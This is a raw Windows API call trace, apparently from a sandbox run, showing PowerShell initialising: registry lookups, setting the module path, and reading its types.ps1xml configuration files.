	[0491.490] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad8ec, lpData=0x0, lpcbData=0x1ad8e8*=0x0 | out: lpType=0x1ad8ec*=0x0, lpData=0x0, lpcbData=0x1ad8e8*=0x0) returned 0x2
	[0491.490] RegCloseKey (hKey=0x318) returned 0x0
	[0491.493] CoTaskMemAlloc (cb=0x20c) returned 0x43fab0
	[0491.494] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x43fab0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0491.495] CoTaskMemFree (pv=0x43fab0) 
	[0491.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0491.496] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0491.503] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0491.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.503] CoTaskMemFree (pv=0x4344f0) 
	[0491.505] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0491.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.505] CoTaskMemFree (pv=0x4344f0) 
	[0492.173] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0492.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0492.173] CoTaskMemFree (pv=0x4344f0) 
	[0492.173] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0492.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0492.174] CoTaskMemFree (pv=0x4344f0) 
	[0492.181] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad758 | out: phkResult=0x1ad758*=0x320) returned 0x0
	[0492.183] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ad76c, lpData=0x0, lpcbData=0x1ad768*=0x0 | out: lpType=0x1ad76c*=0x1, lpData=0x0, lpcbData=0x1ad768*=0x74) returned 0x0
	[0492.184] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ad6dc, lpData=0x0, lpcbData=0x1ad6d8*=0x0 | out: lpType=0x1ad6dc*=0x1, lpData=0x0, lpcbData=0x1ad6d8*=0x74) returned 0x0
	[0492.184] CoTaskMemAlloc (cb=0x78) returned 0x3f0370
	[0492.184] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1ad6ac, lpData=0x3f0370, lpcbData=0x1ad6a8*=0x74 | out: lpType=0x1ad6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad6a8*=0x74) returned 0x0
	[0492.184] CoTaskMemFree (pv=0x3f0370) 
	[0492.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0492.184] SetErrorMode (uMode=0x1) returned 0x1
	[0492.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad630 | out: lpFileInformation=0x1ad630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0492.184] SetErrorMode (uMode=0x1) returned 0x1
	[0492.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0492.187] SetErrorMode (uMode=0x1) returned 0x1
	[0492.187] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad630 | out: lpFileInformation=0x1ad630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0492.187] SetErrorMode (uMode=0x1) returned 0x1
	[0492.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0492.191] SetErrorMode (uMode=0x1) returned 0x1
	[0492.191] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad630 | out: lpFileInformation=0x1ad630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0492.191] SetErrorMode (uMode=0x1) returned 0x1
	[0492.194] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0492.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0492.194] CoTaskMemFree (pv=0x4344f0) 
	[0492.195] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0492.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0492.195] CoTaskMemFree (pv=0x4344f0) 
	[0492.196] GetACP () returned 0x4e4
	[0492.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0492.205] SetErrorMode (uMode=0x1) returned 0x1
	[0492.206] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0492.206] GetFileType (hFile=0x324) returned 0x1
	[0492.207] SetErrorMode (uMode=0x1) returned 0x1
	[0492.207] GetFileType (hFile=0x324) returned 0x1
	[0492.209] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2ec9c58*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0492.211] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2ec9c58*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0492.211] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2ec9c58*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0492.212] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2ec9c58*, lpNumberOfBytesRead=0x1ad568*=0xcf3, lpOverlapped=0x0) returned 1
	[0492.212] ReadFile (in: hFile=0x324, lpBuffer=0x2ec90b3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2ec90b3*, lpNumberOfBytesRead=0x1ad568*=0x0, lpOverlapped=0x0) returned 1
	[0492.212] ReadFile (in: hFile=0x324, lpBuffer=0x2ec9c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2ec9c58*, lpNumberOfBytesRead=0x1ad568*=0x0, lpOverlapped=0x0) returned 1
	[0493.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0493.104] SetErrorMode (uMode=0x1) returned 0x1
	[0493.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad4e0 | out: lpFileInformation=0x1ad4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0493.104] SetErrorMode (uMode=0x1) returned 0x1
	[0493.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0493.105] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad5c8 | out: phkResult=0x1ad5c8*=0x324) returned 0x0
	[0493.105] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad54c, lpData=0x0, lpcbData=0x1ad548*=0x0 | out: lpType=0x1ad54c*=0x1, lpData=0x0, lpcbData=0x1ad548*=0x56) returned 0x0
	[0493.105] CoTaskMemAlloc (cb=0x5a) returned 0x1b836f50
	[0493.105] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad51c, lpData=0x1b836f50, lpcbData=0x1ad518*=0x56 | out: lpType=0x1ad51c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad518*=0x56) returned 0x0
	[0493.105] CoTaskMemFree (pv=0x1b836f50) 
	[0493.105] RegCloseKey (hKey=0x324) returned 0x0
	[0493.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0493.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0493.140] VirtualQuery (in: lpAddress=0x1ac2b0, lpBuffer=0x1ad170, dwLength=0x30 | out: lpBuffer=0x1ad170*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0494.181] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0494.181] GetFileType (hFile=0x320) returned 0x1
	[0494.181] SetErrorMode (uMode=0x1) returned 0x1
	[0494.181] GetFileType (hFile=0x320) returned 0x1
	[0494.181] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.182] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.182] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.183] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.183] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.183] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.183] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.183] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.184] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.185] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.185] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.185] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.185] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.186] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.186] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.186] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.187] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.189] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.189] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.189] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.190] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.190] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.190] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.191] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.191] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.191] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.192] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.192] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.192] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.192] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.193] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.193] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.193] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.197] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.197] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.198] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.198] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.198] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.198] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.198] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.199] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1000, lpOverlapped=0x0) returned 1
	[0494.199] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x1b4, lpOverlapped=0x0) returned 1
	[0494.199] ReadFile (in: hFile=0x320, lpBuffer=0x2da20f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad568, lpOverlapped=0x0 | out: lpBuffer=0x2da20f0*, lpNumberOfBytesRead=0x1ad568*=0x0, lpOverlapped=0x0) returned 1
	[0494.199] CloseHandle (hObject=0x320) returned 1
	[0494.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0494.200] SetErrorMode (uMode=0x1) returned 0x1
	[0494.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad4e0 | out: lpFileInformation=0x1ad4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0494.200] SetErrorMode (uMode=0x1) returned 0x1
	[0494.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0494.200] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad5c8 | out: phkResult=0x1ad5c8*=0x320) returned 0x0
	[0494.200] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad54c, lpData=0x0, lpcbData=0x1ad548*=0x0 | out: lpType=0x1ad54c*=0x1, lpData=0x0, lpcbData=0x1ad548*=0x56) returned 0x0
